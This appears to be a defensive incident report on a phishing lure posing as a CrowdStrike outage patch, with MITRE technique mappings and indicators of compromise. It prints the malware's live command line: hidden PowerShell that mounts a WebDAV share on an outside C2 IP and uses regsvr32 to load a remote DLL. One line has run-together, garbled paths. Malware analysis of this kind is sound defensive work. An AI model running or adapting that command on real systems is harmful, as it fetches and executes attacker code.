PowerShell was executed with -windowstyle hidden on host Wilma. Investigation traced the origin to a phishing email impersonating a CrowdStrike outage patch notification. The email delivered crowdstrike.zip, which contained crowdstrike.bat — a batch script obfuscated using dictionary substitution (e.g., poisonlizard=set g), with malicious commands embedded within junk words.
The script launched wordpad.exe as a decoy process, then executed:
powershell.exe -windowstyle hidden net use \\45.9.74.36@8888\davwwwroot\ ; regsvr32 /s \\45.9.74.36@8888\davwwwroot\1527830137078.dll
This attempted to mount a WebDAV share over port 8888 and register a remote DLL using regsvr32. No network logs confirmed a successful outbound connection to the C2.
Jul 24, 2024, 07:37 AM
C:\Windows\system32\C:\Windows\System32\cmd.exe1527830137078.dllThe threat actor exploited widespread awareness of the CrowdStrike outage to craft a convincing lure, delivering a payload that used dictionary-substitution obfuscation to evade detection. The final stage leveraged regsvr32 — a signed Windows binary — to load a remote DLL, a classic Living Off the Land technique.
| Technique ID | Tactic | Technique |
|---|---|---|
| T1566.001 | Initial Access | Phishing - Spearphishing Attachment |
| T1059.001 | Execution | PowerShell |
| T1027 | Defense Evasion | Obfuscated Files or Information |
| T1218.010 | Defense Evasion | Regsvr32 |
| T1105 | Command and Control | Ingress Tool Transfer |
| T1204.002 | Execution | User Execution - Malicious File |
| Type | Value |
|---|---|
| Email sender | support[@]crowdstrikeoutage[.]com |
| Archive | crowdstrike.zip |
| Script | crowdstrike.bat |
| C2 IP | 45.9.74.36 |
| C2 port | 8888 (WebDAV) |
| DLL | 1527830137078.dll |
| File hash (DLL) | 985a3d6900553536ab9e87d6ff64278f85f4abd865bc16f436846a3b47e9b1f6 |